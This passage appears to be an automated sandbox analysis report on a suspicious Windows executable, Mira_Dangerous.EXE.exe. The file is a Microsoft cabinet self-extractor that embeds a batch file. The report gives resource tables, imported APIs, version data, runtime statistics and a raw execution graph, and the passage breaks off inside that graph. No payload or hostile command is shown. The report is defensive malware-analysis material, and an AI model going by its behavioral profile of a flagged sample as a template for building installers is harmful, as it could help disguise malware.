RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
RT_RCDATA0x298700xae3Microsoft Cabinet archive data, Windows 2000/XP setup, 2787 bytes, 1 file, at 0x2c +A "MIRA_D~1.BAT", ID 896, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.00394689630427
RT_RCDATA0x2a3540x4dataEnglishUnited States3.0
RT_RCDATA0x2a3580x24dataEnglishUnited States0.7222222222222222
RT_RCDATA0x2a37c0x95ASCII text, with no line terminatorsEnglishUnited States0.7785234899328859
RT_RCDATA0x2a4140x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
RT_RCDATA0x2a41c0x4dataEnglishUnited States3.0
RT_RCDATA0x2a4200x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
RT_RCDATA0x2a4280x4dataEnglishUnited States3.0
RT_RCDATA0x2a42c0xdASCII text, with no line terminatorsEnglishUnited States1.6153846153846154
RT_RCDATA0x2a43c0x4dataEnglishUnited States3.0
RT_RCDATA0x2a4400x5ASCII text, with no line terminatorsEnglishUnited States2.6
RT_RCDATA0x2a4480x32dataEnglishUnited States1.02
RT_RCDATA0x2a47c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
RT_GROUP_ICON0x2a4840xbcdataEnglishUnited States0.6117021276595744
RT_VERSION0x2a5400x408dataEnglishUnited States0.42151162790697677
RT_MANIFEST0x2a9480x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906
DLLImport
ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dllGetDeviceCaps
USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
DescriptionData
CompanyNameMicrosoft Corporation
FileDescriptionWin32 Cabinet Self-Extractor
FileVersion11.00.19041.1 (WinBuild.160101.0800)
InternalNameWextract
LegalCopyright Microsoft Corporation. All rights reserved.
OriginalFilenameWEXTRACT.EXE .MUI
ProductNameInternet Explorer
ProductVersion11.00.19041.1
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Statistics

CPU Usage

0510s020406080100

Click to jump to process

Memory Usage

0510s0.00510MB

Click to jump to process

High Level Behavior Distribution

  • File
  • Registry

Click to dive into process behavior distribution

System Behavior

General

Target ID:0
Start time:23:30:09
Start date:20/04/2025
Path:C:\Users\user\Desktop\Mira_Dangerous.EXE.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\Mira_Dangerous.EXE.exe"
Imagebase:0x7ff7a8cc0000
File size:160'256 bytes
MD5 hash:12BD30174702410955D46C23054A0FE6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Thread Activities

Show Windows behavior

Memory Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Disassembly

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:29.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:41.5%
Total number of Nodes:915
Total number of Limit Nodes:21
Show Legend
Hide Nodes/Edges
execution_graph 2066 7ff7a8cc58b0 2067 7ff7a8cc5904 2066->2067 2068 7ff7a8cc58ee 2066->2068 2071 7ff7a8cc5a29 2067->2071 2073 7ff7a8cc58fc 2067->2073 2076 7ff7a8cc591a 2067->2076 2069 7ff7a8cc5770 CloseHandle 2068->2069 2068->2073 2069->2073 2074 7ff7a8cc5a35 SetDlgItemTextA 2071->2074 2075 7ff7a8cc5a4a 2071->2075 2122 7ff7a8cc8470 2073->2122 2074->2075 2075->2073 2094 7ff7a8cc51bc GetFileAttributesA 2075->2094 2076->2073 2077 7ff7a8cc5982 DosDateTimeToFileTime 2076->2077 2077->2073 2079 7ff7a8cc59a3 LocalFileTimeToFileTime 2077->2079 2079->2073 2081 7ff7a8cc59c1 SetFileTime 2079->2081 2081->2073 2082 7ff7a8cc59e9 2081->2082 2091 7ff7a8cc5770 2082->2091 2087 7ff7a8cc5ac1 2113 7ff7a8cc527c LocalAlloc 2087->2113 2090 7ff7a8cc5acb 2090->2073 2092 7ff7a8cc57a4 CloseHandle 2091->2092 2093 7ff7a8cc578f SetFileAttributesA 2091->2093 2092->2093 2093->2073 2095 7ff7a8cc51de 2094->2095 2097 7ff7a8cc525f 2094->2097 2096 7ff7a8cc5246 SetFileAttributesA 2095->2096 2095->2097 2130 7ff7a8cc7ac8 FindResourceA 2095->2130 2096->2097 2097->2073 2101 7ff7a8cc5380 2097->2101 2100 7ff7a8cc523c 2100->2096 2102 7ff7a8cc53b3 2101->2102 2103 7ff7a8cc53d0 2102->2103 2104 7ff7a8cc53fd lstrcmpA 2102->2104 2105 7ff7a8cc4dcc 24 API calls 2103->2105 2106 7ff7a8cc53f4 2104->2106 2107 7ff7a8cc5454 2104->2107 2105->2106 2106->2073 2106->2087 2107->2106 2108 7ff7a8cc54a8 CreateFileA 2107->2108 2108->2106 2110 7ff7a8cc54de 2108->2110 2109 7ff7a8cc5561 CreateFileA 2109->2106 2110->2106 2110->2109 2111 7ff7a8cc5549 CharNextA 2110->2111 2112 7ff7a8cc5532 CreateDirectoryA 2110->2112 2111->2110 2112->2111 2114 7ff7a8cc52aa 2113->2114 2116 7ff7a8cc52d4 2113->2116 2115 7ff7a8cc4dcc 24 API calls 2114->2115 2117 7ff7a8cc52cd 2115->2117 2116->2116 2118 7ff7a8cc52e4 LocalAlloc 2116->2118 2117->2090 2118->2117 2119 7ff7a8cc5300 2118->2119 2120 7ff7a8cc4dcc 24 API calls 2119->2120 2121 7ff7a8cc5323 LocalFree 2120->2121 2121->2117 2123 7ff7a8cc8479 2122->2123 2124 7ff7a8cc5af4 2123->2124 2125 7ff7a8cc84d0 RtlCaptureContext RtlLookupFunctionEntry 2123->2125 2126 7ff7a8cc8515 RtlVirtualUnwind 2125->2126 2127 7ff7a8cc8557 2125->2127 2126->2127 2185 7ff7a8cc8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2127->2185 2131 7ff7a8cc7b63 2130->2131 2132 7ff7a8cc7b03 LoadResource 2130->2132 2137 7ff7a8cc4dcc 2131->2137 2132->2131 2134 7ff7a8cc7b1d DialogBoxIndirectParamA FreeResource 2132->2134 2134->2131 2135 7ff7a8cc5228 2134->2135 2135->2096 2135->2097 2135->2100 2138 7ff7a8cc5024 2137->2138 2139 7ff7a8cc4e49 LoadStringA 2137->2139 2142 7ff7a8cc8470 7 API calls 2138->2142 2140 7ff7a8cc4eb5 2139->2140 2141 7ff7a8cc4e73 2139->2141 2144 7ff7a8cc4f31 2140->2144 2152 7ff7a8cc4ec1 LocalAlloc 2140->2152 2143 7ff7a8cc7f04 13 API calls 2141->2143 2145 7ff7a8cc5035 2142->2145 2146 7ff7a8cc4e78 2143->2146 2149 7ff7a8cc4f44 LocalAlloc 2144->2149 2150 7ff7a8cc4f8e LocalAlloc 2144->2150 2145->2135 2147 7ff7a8cc4e81 MessageBoxA 2146->2147 2178 7ff7a8cc7e34 2146->2178 2147->2138 2149->2138 2157 7ff7a8cc4f79 2149->2157 2150->2138 2162 7ff7a8cc4f2c 2150->2162 2152->2138 2156 7ff7a8cc4f14 2152->2156 2155 7ff7a8cc4fbc MessageBeep 2166 7ff7a8cc7f04 2155->2166 2182 7ff7a8cc114c 2156->2182 2160 7ff7a8cc114c _vsnprintf 2157->2160 2160->2162 2162->2155 2163 7ff7a8cc4fdc MessageBoxA LocalFree 2163->2138 2164 7ff7a8cc7e34 2 API calls 2164->2163 2167 7ff7a8cc7f44 GetVersionExA 2166->2167 2168 7ff7a8cc809c 2166->2168 2169 7ff7a8cc8076 2167->2169 2170 7ff7a8cc7f6d 2167->2170 2171 7ff7a8cc8470 7 API calls 2168->2171 2169->2168 2170->2169 2173 7ff7a8cc7f90 GetSystemMetrics 2170->2173 2172 7ff7a8cc4fd3 2171->2172 2172->2163 2172->2164 2173->2169 2174 7ff7a8cc7fa7 RegOpenKeyExA 2173->2174 2174->2169 2175 7ff7a8cc7fdc RegQueryValueExA RegCloseKey 2174->2175 2175->2169 2177 7ff7a8cc8026 2175->2177 2176 7ff7a8cc8065 CharNextA 2176->2177 2177->2169 2177->2176 2179 7ff7a8cc7e5a EnumResourceLanguagesA 2178->2179 2180 7ff7a8cc7edd 2178->2180 2179->2180 2181 7ff7a8cc7e9f EnumResourceLanguagesA 2179->2181 2180->2147 2181->2180 2183 7ff7a8cc1178 _vsnprintf 2182->2183 2184 7ff7a8cc1199 2182->2184 2183->2184 2184->2162 2186 7ff7a8cc5690 2193 7ff7a8cc3b40 2186->2193 2189 7ff7a8cc56c2 WriteFile 2190 7ff7a8cc56ba 2189->2190 2191 7ff7a8cc56f9 2189->2191 2191->2190 2192 7ff7a8cc5725 SendDlgItemMessageA 2191->2192 2192->2190 2194 7ff7a8cc3b4c MsgWaitForMultipleObjects 2193->2194 2195 7ff7a8cc3be5 2194->2195 2196 7ff7a8cc3b74 PeekMessageA 2194->2196 2195->2189 2195->2190 2196->2194 2197 7ff7a8cc3b99 2196->2197 2197->2194 2197->2195 2198 7ff7a8cc3ba7 DispatchMessageA 2197->2198 2199 7ff7a8cc3bb8 PeekMessageA 2197->2199 2198->2199 2199->2197 2944 7ff7a8cc33f0 2945 7ff7a8cc34ec 2944->2945 2948 7ff7a8cc3402 2944->2948 2946 7ff7a8cc34e5 2945->2946 2947 7ff7a8cc34f5 SendDlgItemMessageA 2945->2947 2947->2946 2949 7ff7a8cc340f 2948->2949 2951 7ff7a8cc3441 GetDesktopWindow 2948->2951 2949->2946 2950 7ff7a8cc3430 EndDialog 2949->2950 2950->2946 2954 7ff7a8cc4c68 6 API calls 2951->2954 2956 7ff7a8cc4d3f SetWindowPos 2954->2956 2957 7ff7a8cc8470 7 API calls 2956->2957 2958 7ff7a8cc3458 6 API calls 2957->2958 2958->2946 2959 7ff7a8cc5870 GlobalAlloc 2960 7ff7a8cc78b0 2961 7ff7a8cc78fd 2960->2961 2962 7ff7a8cc7ba8 CharPrevA 2961->2962 2963 7ff7a8cc7935 CreateFileA 2962->2963 2964 7ff7a8cc7970 2963->2964 2965 7ff7a8cc797e WriteFile 2963->2965 2968 7ff7a8cc8470 7 API calls 2964->2968 2966 7ff7a8cc79a2 CloseHandle 2965->2966 2966->2964 2969 7ff7a8cc79d5 2968->2969 2970 7ff7a8cc4a30 2971 7ff7a8cc4a50 2970->2971 2972 7ff7a8cc4a39 SendMessageA 2970->2972 2972->2971 2973 7ff7a8cc3530 2974 7ff7a8cc3802 EndDialog 2973->2974 2975 7ff7a8cc3557 2973->2975 2976 7ff7a8cc356b 2974->2976 2977 7ff7a8cc3567 2975->2977 2978 7ff7a8cc377e GetDesktopWindow 2975->2978 2977->2976 2981 7ff7a8cc3635 GetDlgItemTextA 2977->2981 2982 7ff7a8cc357b 2977->2982 2979 7ff7a8cc4c68 14 API calls 2978->2979 2980 7ff7a8cc3795 SetWindowTextA SendDlgItemMessageA 2979->2980 2980->2976 2983 7ff7a8cc37d8 GetDlgItem EnableWindow 2980->2983 2991 7ff7a8cc365e 2981->2991 3007 7ff7a8cc36e9 2981->3007 2984 7ff7a8cc3584 2982->2984 2985 7ff7a8cc3618 EndDialog 2982->2985 2983->2976 2984->2976 2986 7ff7a8cc3591 LoadStringA 2984->2986 2985->2976 2987 7ff7a8cc35de 2986->2987 2988 7ff7a8cc35bd 2986->2988 3010 7ff7a8cc4a60 LoadLibraryA 2987->3010 2993 7ff7a8cc4dcc 24 API calls 2988->2993 2990 7ff7a8cc4dcc 24 API calls 2990->2976 2992 7ff7a8cc3694 GetFileAttributesA 2991->2992 2991->3007 2995 7ff7a8cc36fa 2992->2995 2996 7ff7a8cc36a8 2992->2996 3008 7ff7a8cc35d7 2993->3008 3000 7ff7a8cc7ba8 CharPrevA 2995->3000 2998 7ff7a8cc4dcc 24 API calls 2996->2998 2997 7ff7a8cc35eb SetDlgItemTextA 2997->2976 2997->2988 3001 7ff7a8cc36cb 2998->3001 2999 7ff7a8cc374b EndDialog 2999->2976 3002 7ff7a8cc370e 3000->3002 3001->2976 3003 7ff7a8cc36d4 CreateDirectoryA 3001->3003 3004 7ff7a8cc6b70 31 API calls 3002->3004 3003->2995 3003->3007 3005 7ff7a8cc3716 3004->3005 3006 7ff7a8cc3721 3005->3006 3005->3007 3006->3008 3009 7ff7a8cc6ca4 38 API calls 3006->3009 3007->2990 3008->2976 3008->2999 3009->3008 3011 7ff7a8cc4c20 3010->3011 3012 7ff7a8cc4aa0 GetProcAddress 3010->3012 3016 7ff7a8cc4dcc 24 API calls 3011->3016 3013 7ff7a8cc4ac2 GetProcAddress 3012->3013 3014 7ff7a8cc4c0a FreeLibrary 3012->3014 3013->3014 3015 7ff7a8cc4ae2 GetProcAddress 3013->3015 3014->3011 3015->3014 3017 7ff7a8cc4b04 3015->3017 3018 7ff7a8cc35e3 3016->3018 3019 7ff7a8cc4b13 GetTempPathA 3017->3019 3024 7ff7a8cc4b65 3017->3024 3018->2976 3018->2997 3020 7ff7a8cc4b2b 3019->3020 3020->3020 3021 7ff7a8cc4b34 CharPrevA 3020->3021 3022 7ff7a8cc4b4e CharPrevA 3021->3022 3021->3024 3022->3024 3023 7ff7a8cc4bee FreeLibrary 3023->3018 3024->3023 3025 7ff7a8cc3910 3026 7ff7a8cc3a09 3025->3026 3027 7ff7a8cc3933 3025->3027 3028 7ff7a8cc3b1a EndDialog 3026->3028 3031 7ff7a8cc3954 3026->3031 3027->3026 3029 7ff7a8cc3a11 GetDesktopWindow 3027->3029 3030 7ff7a8cc3948 3027->3030 3028->3031 3032 7ff7a8cc4c68 14 API calls 3029->3032 3033 7ff7a8cc394c 3030->3033 3034 7ff7a8cc397b 3030->3034 3036 7ff7a8cc3a2f 3032->3036 3033->3031 3037 7ff7a8cc395b TerminateThread 3033->3037 3034->3031 3035 7ff7a8cc3985 ResetEvent 3034->3035 3038 7ff7a8cc4dcc 24 API calls 3035->3038 3039 7ff7a8cc3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 3036->3039 3040 7ff7a8cc3a9b SetWindowTextA CreateThread 3036->3040 3037->3028 3041 7ff7a8cc39c3 3038->3041 3039->3040 3040->3031 3042 7ff7a8cc3ae8 3040->3042 3043 7ff7a8cc39e4 SetEvent 3041->3043 3045 7ff7a8cc39cc SetEvent 3041->3045 3044 7ff7a8cc4dcc 24 API calls 3042->3044 3046 7ff7a8cc3b40 4 API calls 3043->3046 3044->3026 3045->3031 3046->3026 3047 7ff7a8cc80d0 3049 7ff7a8cc80e2 3047->3049 3054 7ff7a8cc8818 GetModuleHandleW 3049->3054 3050 7ff7a8cc8149 __set_app_type 3051 7ff7a8cc8186 3050->3051 3052 7ff7a8cc818f __setusermatherr 3051->3052 3053 7ff7a8cc819c 3051->3053 3052->3053 3055 7ff7a8cc882d 3054->3055 3055->3050 3056 7ff7a8cc81b0 __getmainargs 3057 7ff7a8cc8b30 _XcptFilter 3058 7ff7a8cc8790 SetUnhandledExceptionFilter 3059 7ff7a8cc8750 3060 7ff7a8cc875f 3059->3060 3061 7ff7a8cc8782 3059->3061 3060->3061 3062 7ff7a8cc877b ?terminate@ 3060->3062 3062->3061 3063 7ff7a8cc57e0 3065 7ff7a8cc581e 3063->3065 3066 7ff7a8cc57fc 3063->3066 3064 7ff7a8cc583d SetFilePointer 3064->3066 3065->3064 3065->3066 3067 7ff7a8cc55e0 3068 7ff7a8cc5641 ReadFile 3067->3068 3069 7ff7a8cc560d 3067->3069 3068->3069 3070 7ff7a8cc33a0 3071 7ff7a8cc33ac 3070->3071 3072 7ff7a8cc33bb CallWindowProcA 3070->3072 3071->3072 3073 7ff7a8cc33b7 3071->3073 3072->3073 3074 7ff7a8cc1500 3075 7ff7a8cc1530 3074->3075 3076 7ff7a8cc1557 GetDesktopWindow 3074->3076 3078 7ff7a8cc1553 3075->3078 3080 7ff7a8cc1542 EndDialog 3075->3080 3077 7ff7a8cc4c68 14 API calls 3076->3077 3079 7ff7a8cc156e LoadStringA SetDlgItemTextA MessageBeep 3077->3079 3081 7ff7a8cc8470 7 API calls 3078->3081 3079->3078 3080->3078 3082 7ff7a8cc15d0 3081->3082 3083 7ff7a8cc3840 3084 7ff7a8cc3852 3083->3084 3085 7ff7a8cc385a 3083->3085 3084->3085 3087 7ff7a8cc388e GetDesktopWindow 3084->3087 3086 7ff7a8cc38ec EndDialog 3085->3086 3088 7ff7a8cc385f 3085->3088 3086->3088 3089 7ff7a8cc4c68 14 API calls 3087->3089 3090 7ff7a8cc38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3089->3090 3090->3088 2200 7ff7a8cc8200 2219 7ff7a8cc8964 2200->2219 2204 7ff7a8cc824b 2205 7ff7a8cc825d 2204->2205 2206 7ff7a8cc8277 Sleep 2204->2206 2207 7ff7a8cc826d _amsg_exit 2205->2207 2209 7ff7a8cc8284 2205->2209 2206->2204 2207->2209 2208 7ff7a8cc82fc _initterm 2211 7ff7a8cc8319 _IsNonwritableInCurrentImage 2208->2211 2209->2208 2210 7ff7a8cc82dd 2209->2210 2209->2211 2212 7ff7a8cc83f8 _ismbblead 2211->2212 2213 7ff7a8cc837d 2211->2213 2212->2211 2223 7ff7a8cc2c54 GetVersion 2213->2223 2216 7ff7a8cc83cf 2216->2210 2218 7ff7a8cc83d8 _cexit 2216->2218 2217 7ff7a8cc83c7 exit 2217->2216 2218->2210 2220 7ff7a8cc8209 GetStartupInfoW 2219->2220 2221 7ff7a8cc8990 6 API calls 2219->2221 2220->2204 2222 7ff7a8cc8a0f 2221->2222 2222->2220 2224 7ff7a8cc2cc3 2223->2224 2225 7ff7a8cc2c7b 2223->2225 2245 7ff7a8cc2db4 2224->2245 2225->2224 2226 7ff7a8cc2c7f GetModuleHandleW 2225->2226 2226->2224 2228 7ff7a8cc2c97 GetProcAddress 2226->2228 2228->2224 2230 7ff7a8cc2cb2 2228->2230 2230->2224 2231 7ff7a8cc2d7f 2232 7ff7a8cc2d97 2231->2232 2233 7ff7a8cc2d8b CloseHandle 2231->2233 2232->2216 2232->2217 2233->2232 2238 7ff7a8cc2d29 2238->2231 2239 7ff7a8cc2d59 2238->2239 2241 7ff7a8cc4dcc 24 API calls 2238->2241 2239->2231 2242 7ff7a8cc2d7a 2239->2242 2243 7ff7a8cc2d67 ExitWindowsEx 2239->2243 2241->2239 2360 7ff7a8cc1c0c GetCurrentProcess OpenProcessToken 2242->2360 2243->2231 2246 7ff7a8cc8b09 2245->2246 2247 7ff7a8cc2df9 memset memset 2246->2247 2368 7ff7a8cc5050 FindResourceA SizeofResource 2247->2368 2250 7ff7a8cc2fb5 2253 7ff7a8cc4dcc 24 API calls 2250->2253 2251 7ff7a8cc2e53 CreateEventA SetEvent 2252 7ff7a8cc5050 7 API calls 2251->2252 2254 7ff7a8cc2e92 2252->2254 2260 7ff7a8cc2eb4 2253->2260 2255 7ff7a8cc2e96 2254->2255 2258 7ff7a8cc2fa3 2254->2258 2259 7ff7a8cc5050 7 API calls 2254->2259 2256 7ff7a8cc4dcc 24 API calls 2255->2256 2256->2260 2257 7ff7a8cc8470 7 API calls 2261 7ff7a8cc2cd4 2257->2261 2373 7ff7a8cc70a8 2258->2373 2263 7ff7a8cc2eec 2259->2263 2260->2257 2261->2231 2290 7ff7a8cc30ec 2261->2290 2263->2255 2265 7ff7a8cc2efe CreateMutexA 2263->2265 2265->2258 2267 7ff7a8cc2f22 GetLastError 2265->2267 2266 7ff7a8cc2fc4 2268 7ff7a8cc2fde FindResourceExA 2266->2268 2269 7ff7a8cc2fcd 2266->2269 2267->2258 2270 7ff7a8cc2f35 2267->2270 2272 7ff7a8cc2fff LoadResource 2268->2272 2273 7ff7a8cc3014 2268->2273 2400 7ff7a8cc204c 2269->2400 2274 7ff7a8cc2f62 2270->2274 2275 7ff7a8cc2f4a 2270->2275 2272->2273 2278 7ff7a8cc3029 2273->2278 2279 7ff7a8cc301d #17 2273->2279 2276 7ff7a8cc4dcc 24 API calls 2274->2276 2277 7ff7a8cc4dcc 24 API calls 2275->2277 2281 7ff7a8cc2f7c 2276->2281 2282 7ff7a8cc2f60 2277->2282 2278->2260 2280 7ff7a8cc303a 2278->2280 2279->2278 2415 7ff7a8cc3bf4 GetVersionExA 2280->2415 2281->2258 2283 7ff7a8cc2f81 CloseHandle 2281->2283 2282->2283 2283->2260 2288 7ff7a8cc7ac8 28 API calls 2289 7ff7a8cc309b 2288->2289 2289->2260 2291 7ff7a8cc3141 2290->2291 2294 7ff7a8cc3116 2290->2294 2524 7ff7a8cc5fe4 2291->2524 2293 7ff7a8cc3134 2675 7ff7a8cc3f74 2293->2675 2294->2293 2505 7ff7a8cc60a4 2294->2505 2299 7ff7a8cc3230 2303 7ff7a8cc8470 7 API calls 2299->2303 2305 7ff7a8cc2ce1 2303->2305 2304 7ff7a8cc315b GetSystemDirectoryA 2306 7ff7a8cc7ba8 CharPrevA 2304->2306 2335 7ff7a8cc61ec 2305->2335 2307 7ff7a8cc3186 LoadLibraryA 2306->2307 2308 7ff7a8cc319f GetProcAddress 2307->2308 2309 7ff7a8cc31c9 FreeLibrary 2307->2309 2308->2309 2312 7ff7a8cc31ba DecryptFileA 2308->2312 2310 7ff7a8cc31e4 2309->2310 2311 7ff7a8cc3273 SetCurrentDirectoryA 2309->2311 2310->2311 2314 7ff7a8cc31f0 GetWindowsDirectoryA 2310->2314 2313 7ff7a8cc320d 2311->2313 2319 7ff7a8cc3291 2311->2319 2312->2309 2317 7ff7a8cc4dcc 24 API calls 2313->2317 2314->2313 2316 7ff7a8cc325a 2314->2316 2315 7ff7a8cc331f 2315->2299 2322 7ff7a8cc2318 18 API calls 2315->2322 2328 7ff7a8cc3347 2315->2328 2583 7ff7a8cc6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2316->2583 2320 7ff7a8cc322b 2317->2320 2319->2315 2323 7ff7a8cc32fb 2319->2323 2326 7ff7a8cc32cb 2319->2326 2694 7ff7a8cc7700 GetLastError 2320->2694 2322->2328 2609 7ff7a8cc5d90 2323->2609 2325 7ff7a8cc3368 2325->2299 2329 7ff7a8cc3383 2325->2329 2330 7ff7a8cc7ac8 28 API calls 2326->2330 2328->2325 2629 7ff7a8cc40c4 2328->2629 2705 7ff7a8cc494c 2329->2705 2331 7ff7a8cc32f6 2330->2331 2331->2299 2695 7ff7a8cc772c 2331->2695 2336 7ff7a8cc6214 2335->2336 2337 7ff7a8cc624c LocalFree LocalFree 2336->2337 2339 7ff7a8cc6229 SetFileAttributesA DeleteFileA 2336->2339 2346 7ff7a8cc6273 2336->2346 2337->2336 2338 7ff7a8cc6311 2340 7ff7a8cc6387 2338->2340 2342 7ff7a8cc632d RegOpenKeyExA 2338->2342 2339->2337 2341 7ff7a8cc8470 7 API calls 2340->2341 2343 7ff7a8cc2ce8 2341->2343 2342->2340 2344 7ff7a8cc635e RegDeleteValueA RegCloseKey 2342->2344 2343->2231 2343->2238 2349 7ff7a8cc2318 2343->2349 2344->2340 2345 7ff7a8cc62f4 SetCurrentDirectoryA 2347 7ff7a8cc204c 16 API calls 2345->2347 2346->2338 2346->2345 2348 7ff7a8cc7c40 4 API calls 2346->2348 2347->2338 2348->2345 2350 7ff7a8cc2330 2349->2350 2351 7ff7a8cc2447 2349->2351 2352 7ff7a8cc23cb RegOpenKeyExA 2350->2352 2354 7ff7a8cc233a 2350->2354 2936 7ff7a8cc2244 GetWindowsDirectoryA 2351->2936 2355 7ff7a8cc23c3 2352->2355 2356 7ff7a8cc23fe RegQueryInfoKeyA 2352->2356 2354->2355 2357 7ff7a8cc234a RegOpenKeyExA 2354->2357 2355->2238 2358 7ff7a8cc23a8 RegCloseKey 2356->2358 2357->2355 2359 7ff7a8cc237d RegQueryValueExA 2357->2359 2358->2355 2359->2358 2361 7ff7a8cc1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2360->2361 2362 7ff7a8cc1c4c 2360->2362 2361->2362 2363 7ff7a8cc1cec ExitWindowsEx 2361->2363 2364 7ff7a8cc4dcc 24 API calls 2362->2364 2363->2362 2365 7ff7a8cc1c68 2363->2365 2364->2365 2366 7ff7a8cc8470 7 API calls 2365->2366 2367 7ff7a8cc1d1a 2366->2367 2367->2231 2369 